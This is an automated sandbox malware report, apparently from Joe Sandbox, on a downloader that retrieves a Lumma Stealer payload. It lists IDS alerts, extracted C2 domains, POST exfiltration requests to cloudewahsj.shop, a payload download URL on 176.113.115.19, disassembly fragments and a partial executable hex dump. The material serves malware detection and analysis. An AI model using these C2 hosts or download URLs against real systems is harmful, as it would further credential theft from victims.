Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_020FC847
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov ecx, eax	3_2_020E886C
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_020FF97D
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	3_2_020D7997
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	3_2_020D7997
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov word ptr [ebx], ax	3_2_020EA9D7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov ecx, eax	3_2_020F7E77
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh	3_2_02114E87
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then jmp ecx	3_2_020F8EB2
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov edx, ecx	3_2_020FAF50
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edx, word ptr [ebx]	3_2_0210CFA7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]	3_2_020FAC89
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	3_2_020EBCB9
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov esi, ecx	3_2_020EBCB9
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	3_2_020EBCB9
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	3_2_02110CF7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_020FFDE4
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov ecx, eax	3_2_020EADF7

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058606 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) : 192.168.2.8:65229 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.8:49710 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.8:49717 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.8:49711 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.8:49712 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.8:49714 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49711 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49711 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49712 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49710 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49710 -> 104.21.48.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: framekgirus.shop

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 04 Jan 2025 14:33:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 04 Jan 2025 14:30:02 GMTETag: "4f200-62ae23b0f3374"Accept-Ranges: bytesContent-Length: 324096Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1a 24 02 80 5e 45 6c d3 5e 45 6c d3 5e 45 6c d3 e3 0a fa d3 5f 45 6c d3 40 17 e8 d3 7b 45 6c d3 40 17 f9 d3 44 45 6c d3 40 17 ef d3 20 45 6c d3 79 83 17 d3 59 45 6c d3 5e 45 6d d3 24 45 6c d3 40 17 e6 d3 5f 45 6c d3 40 17 f8 d3 5f 45 6c d3 40 17 fd d3 5f 45 6c d3 52 69 63 68 5e 45 6c d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c4 cc 27 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 04 00 00 38 01 00 00 00 00 00 5f 44 00 00 00 10 00 00 00 30 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 59 93 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 23 04 00 50 00 00 00 00 e0 04 00 d0 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 2d 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 52 1c 04 00 00 10 00 00 00 1e 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c ac 00 00 00 30 04 00 00 60 00 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 cf 00 00 00 e0 04 00 00 70 00 00 00 82 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.56.70 104.21.56.70
Source: Joe Sandbox View	IP Address: 176.113.115.19 176.113.115.19

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49717 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49709 -> 176.113.115.19:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49708 -> 104.21.56.70:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cloudewahsj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: cloudewahsj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2CAQHOM2KJJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12799Host: cloudewahsj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9Q1YI2VH1TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15022Host: cloudewahsj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6ZVS3HMZK6EF2EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20213Host: cloudewahsj.shop

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19

Source: C:\Users\user\Desktop\J18zxRjOes.exe

Code function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_004029F4

Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19

Source: global traffic	DNS traffic detected: DNS query: post-to-me.com
Source: global traffic	DNS traffic detected: DNS query: cloudewahsj.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cloudewahsj.shop

Source: J18zxRjOes.exe, J18zxRjOes.exe, 00000000.00000002.3948229777.000000000070D000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810771013.0000000000756000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.000000000070C000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000002.3948293292.0000000000756000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.1591238252.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
Source: J18zxRjOes.exe, 00000000.00000003.3810731766.0000000000789000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000002.3948293292.000000000078C000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.1591238252.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe%B
Source: J18zxRjOes.exe, 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
Source: J18zxRjOes.exe, 00000000.00000003.1591238252.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeiA#
Source: J18zxRjOes.exe, 00000000.00000003.1591238252.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exel
Source: 628E.tmp.exe, 00000003.00000003.1659927938.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 628E.tmp.exe, 00000003.00000003.1659927938.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 628E.tmp.exe, 00000003.00000003.1659927938.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 628E.tmp.exe, 00000003.00000003.1659927938.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 628E.tmp.exe, 00000003.00000003.1659927938.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 628E.tmp.exe, 00000003.00000003.1659927938.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 628E.tmp.exe, 00000003.00000003.1659927938.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 628E.tmp.exe, 00000003.00000003.1659927938.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 628E.tmp.exe, 00000003.00000003.1659927938.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: 628E.tmp.exe, 00000003.00000003.1659927938.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 628E.tmp.exe, 00000003.00000003.1659927938.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 628E.tmp.exe, 00000003.00000003.1674075135.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1674094483.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1673634325.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1659801675.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1656763886.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1630460444.000000000050A000.00000004.00000020.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1629782890.0000000000500000.00000004.00000020.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1658044622.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1659115015.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1662055207.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000002.1737269659.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudewahsj.shop/
Source: 628E.tmp.exe, 00000003.00000003.1674075135.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1674094483.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1673634325.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000002.1737269659.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudewahsj.shop/A
Source: 628E.tmp.exe, 00000003.00000002.1730668845.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1630460444.000000000050A000.00000004.00000020.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1629782890.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudewahsj.shop/api
Source: 628E.tmp.exe, 00000003.00000003.1630071619.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1629782890.00000000004E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudewahsj.shop/apiL
Source: 628E.tmp.exe, 00000003.00000003.1630460444.000000000050A000.00000004.00000020.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1629782890.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudewahsj.shop/apiR
Source: 628E.tmp.exe, 00000003.00000003.1630460444.000000000050A000.00000004.00000020.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1629782890.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudewahsj.shop/apic
Source: 628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: J18zxRjOes.exe, 00000000.00000002.3948229777.000000000070D000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.000000000070C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/
Source: J18zxRjOes.exe	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: J18zxRjOes.exe, 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: J18zxRjOes.exe, 00000000.00000002.3948229777.000000000070D000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.000000000070C000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000002.3948229777.0000000000723000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.0000000000723000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
Source: J18zxRjOes.exe, 00000000.00000002.3948229777.000000000070D000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.000000000070C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DES
Source: J18zxRjOes.exe, 00000000.00000002.3948229777.0000000000723000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.0000000000723000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEi
Source: J18zxRjOes.exe, 00000000.00000002.3948229777.000000000070D000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.000000000070C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEllWB
Source: J18zxRjOes.exe, 00000000.00000002.3948229777.000000000070D000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.000000000070C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEram
Source: J18zxRjOes.exe, 00000000.00000002.3948229777.000000000070D000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.000000000070C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/u
Source: 628E.tmp.exe, 00000003.00000003.1662159628.0000000002F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 628E.tmp.exe, 00000003.00000003.1662159628.0000000002F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
